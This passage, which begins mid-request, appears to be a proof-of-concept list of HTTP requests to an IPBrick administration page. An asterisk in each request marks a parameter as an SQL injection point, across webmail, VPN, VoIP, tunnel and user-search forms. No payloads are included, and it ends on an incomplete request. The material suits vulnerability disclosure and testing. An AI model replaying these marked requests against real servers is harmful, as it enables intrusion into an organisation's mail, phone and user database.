name=\"event_type_action[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"show_alt_emails\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"horde_signature\"\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"f_accao\"\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a

POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"pagina\"\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"imap_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"smtp_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"db_server\"\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"login_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"logo_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"can_export\"\x0d\x0a\x0d\x0at*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_users\"\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_prefs\"\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_calendar_info\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_show_company_logo\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_hide_never\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_one_year_max\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_state\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_resource_users\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_interval\"\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"lastrmt\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_name[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_doAction[1]\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_action[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"show_alt_emails\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"horde_signature\"\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"f_accao\"\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a

GET
https://ipbrick.domain.com/corpo.php?pagina=export_access_pdf&dateStart=2018-03-16&dateEnd=2018-03-16*&periodo=1&a_ppp=ppp&offset=0&limit=0

GET
https://ipbrick.domain.com/corpo.php?pagina=export_access_pdf&dateStart=2018-03-16*&dateEnd=2018-03-16&periodo=1&a_ppp=ppp&offset=0&limit=0

POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"pagina\"\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"imap_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"smtp_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"db_server\"\x0d\x0a\x0d\x0alocalhost*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"login_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"logo_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"can_export\"\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_users\"\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_prefs\"\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_calendar_info\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_show_company_logo\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_hide_never\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_one_year_max\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_state\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_resource_users\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_interval\"\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"lastrmt\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_name[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_doAction[1]\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_action[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"show_alt_emails\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"horde_signature\"\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"f_accao\"\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a

POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"pagina\"\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"imap_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"smtp_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"db_server\"\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"login_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"logo_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"can_export\"\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_users\"\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_prefs\"\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_calendar_info\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_show_company_logo\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_hide_never\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_one_year_max\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_state\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_resource_users\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_interval\"\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"lastrmt\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_name[1]\"\x0d\x0a\x0d\x0a*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_doAction[1]\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_action[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"show_alt_emails\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"horde_signature\"\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"f_accao\"\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a

POST
https://ipbrick.domain.com/corpo.php
-----------------------------9173100016821337141718121561\x0d\x0aContent-Disposition: form-data; name=\"pagina\"\x0d\x0a\x0d\x0avoip_options_alterar_altera\x0d\x0a-----------------------------9173100016821337141718121561\x0d\x0aContent-Disposition: form-data; name=\"option\"\x0d\x0a\x0d\x0aintercom\x0d\x0a-----------------------------9173100016821337141718121561\x0d\x0aContent-Disposition: form-data; name=\"estado_intercom_unidir\"\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------9173100016821337141718121561\x0d\x0aContent-Disposition: form-data; name=\"extra_intercom_unidir\"\x0d\x0a\x0d\x0a*62*\x0d\x0a-----------------------------9173100016821337141718121561\x0d\x0aContent-Disposition: form-data; name=\"estado_intercom_bidir\"\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------9173100016821337141718121561\x0d\x0aContent-Disposition: form-data; name=\"extra_intercom_bidir\"\x0d\x0a\x0d\x0a*63\x0d\x0a-----------------------------9173100016821337141718121561\x0d\x0aContent-Disposition: form-data; name=\"extra_intercom_restriction\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------9173100016821337141718121561\x0d\x0aContent-Disposition: form-data; name=\"f_accao\"\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------9173100016821337141718121561--\x0d\x0a

GET
https://ipbrick.domain.com/corpo.php?pagina=user_sys_ver&f_idusersystem=172115923*

POST
https://ipbrick.domain.com/corpo.php
pagina=vpn_configuracao_alterar_altera&f_ip_inicio_1=192&f_ip_inicio_2=168&f_ip_inicio_3=69&f_ip_inicio_4=90&f_ip_fim_1=192*&f_ip_fim_2=168&f_ip_fim_3=69&f_ip_fim_4=99&f_accao=Modify

POST
https://ipbrick.domain.com/corpo.php
pagina=vpn_configuracao_alterar_altera&f_ip_inicio_1=192&f_ip_inicio_2=168&f_ip_inicio_3=69&f_ip_inicio_4=90&f_ip_fim_1=192&f_ip_fim_2=168*&f_ip_fim_3=69&f_ip_fim_4=99&f_accao=Modify

POST
https://ipbrick.domain.com/corpo.php
pagina=vpn_configuracao_alterar_altera&f_ip_inicio_1=192&f_ip_inicio_2=168&f_ip_inicio_3=69&f_ip_inicio_4=90&f_ip_fim_1=192&f_ip_fim_2=168&f_ip_fim_3=69*&f_ip_fim_4=99&f_accao=Modify

POST
https://ipbrick.domain.com/corpo.php
pagina=vpn_configuracao_alterar_altera&f_ip_inicio_1=192&f_ip_inicio_2=168&f_ip_inicio_3=69&f_ip_inicio_4=90&f_ip_fim_1=192&f_ip_fim_2=168&f_ip_fim_3=69&f_ip_fim_4=99*&f_accao=Modify

POST
https://ipbrick.domain.com/corpo.php
pagina=vpn_configuracao_alterar_altera&f_ip_inicio_1=192*&f_ip_inicio_2=168&f_ip_inicio_3=69&f_ip_inicio_4=90&f_ip_fim_1=192&f_ip_fim_2=168&f_ip_fim_3=69&f_ip_fim_4=99&f_accao=Modify

POST
https://ipbrick.domain.com/corpo.php
pagina=vpn_configuracao_alterar_altera&f_ip_inicio_1=192&f_ip_inicio_2=168*&f_ip_inicio_3=69&f_ip_inicio_4=90&f_ip_fim_1=192&f_ip_fim_2=168&f_ip_fim_3=69&f_ip_fim_4=99&f_accao=Modify

POST
https://ipbrick.domain.com/corpo.php
pagina=vpn_configuracao_alterar_altera&f_ip_inicio_1=192&f_ip_inicio_2=168&f_ip_inicio_3=69*&f_ip_inicio_4=90&f_ip_fim_1=192&f_ip_fim_2=168&f_ip_fim_3=69&f_ip_fim_4=99&f_accao=Modify

POST
https://ipbrick.domain.com/corpo.php
pagina=vpn_configuracao_alterar_altera&f_ip_inicio_1=192&f_ip_inicio_2=168&f_ip_inicio_3=69&f_ip_inicio_4=90*&f_ip_fim_1=192&f_ip_fim_2=168&f_ip_fim_3=69&f_ip_fim_4=99&f_accao=Modify

POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"pagina\"\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"imap_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"smtp_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"db_server\"\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"login_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"logo_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"can_export\"\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_users\"\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_prefs\"\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_calendar_info\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_show_company_logo\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_hide_never\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_one_year_max\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_state\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_resource_users\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_interval\"\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"lastrmt\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_name[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_doAction[1]\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_action[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"show_alt_emails\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"horde_signature\"\x0d\x0a\x0d\x0a  *\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"f_accao\"\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a

POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"pagina\"\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"imap_server\"\x0d\x0a\x0d\x0aipbrick.domain.com*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"smtp_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"db_server\"\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"login_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"logo_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"can_export\"\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_users\"\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_prefs\"\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_calendar_info\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_show_company_logo\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_hide_never\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_one_year_max\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_state\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_resource_users\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_interval\"\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"lastrmt\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_name[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_doAction[1]\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_action[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"show_alt_emails\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"horde_signature\"\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"f_accao\"\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a

POST
https://ipbrick.domain.com/corpo.php
-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\"pagina\"\x0d\x0a\x0d\x0avoip_placas_pstn_submitdb\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\"tipoplaca\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\"manufacturer\"\x0d\x0a\x0d\x0a6\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\"numportas\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\"interface1\"\x0d\x0a\x0d\x0aPSTN*\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\"porta1\"\x0d\x0a\x0d\x0aTE PtP\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\"inserir\"\x0d\x0a\x0d\x0aInsert\x0d\x0a-----------------------------1263099156734327261671054908--\x0d\x0a

POST
https://ipbrick.domain.com/corpo.php
pagina=gre_alt_acc*&idgre=2&reload=1&control=2&lastrmt=0&name=a&description=b&active=t&lo_ip1=10&lo_ip2=0&lo_ip3=0&lo_ip4=253&li_ip1=192&li_ip2=168&li_ip3=69&li_ip4=199&ro_ip1=1&ro_ip2=1&ro_ip3=1&ro_ip4=12&alterar=Modify

GET
https://ipbrick.domain.com/corpo.php?pagina=utilizador_ver_lista&offset=0&first_char=&pesq_nome=*

POST
https://ipbrick.domain.com/corpo.php
-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\"pagina\"\x0d\x0a\x0d\x0avoip_placas_pstn_submitdb\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\"tipoplaca\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\"manufacturer\"\x0d\x0a\x0d\x0a6\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\"numportas\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\"interface1\"\x0d\x0a\x0d\x0aPSTN\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\"porta1\"\x0d\x0a\x0d\x0aTE PtP*\x0d\x0a-----------------------------1263099156734327261671054908\x0d\x0aContent-Disposition: form-data; name=\"inserir\"\x0d\x0a\x0d\x0aInsert\x0d\x0a-----------------------------1263099156734327261671054908--\x0d\x0a

POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"pagina\"\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"imap_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"smtp_server\"\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"db_server\"\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"login_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"logo_patch\"; filename=\"\"\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"can_export\"\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_users\"\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"admin_prefs\"\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_calendar_info\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_show_company_logo\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_hide_never\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"tb_plugin_recur_one_year_max\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_state\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_resource_users\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"resources_executing_interval\"\x0d\x0a\x0d\x0a2*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"lastrmt\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_name[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_doAction[1]\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"event_type_action[1]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"show_alt_emails\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"horde_signature\"\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\"f_accao\"\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a

POST
https://ipbrick.domain.com/corpo.php
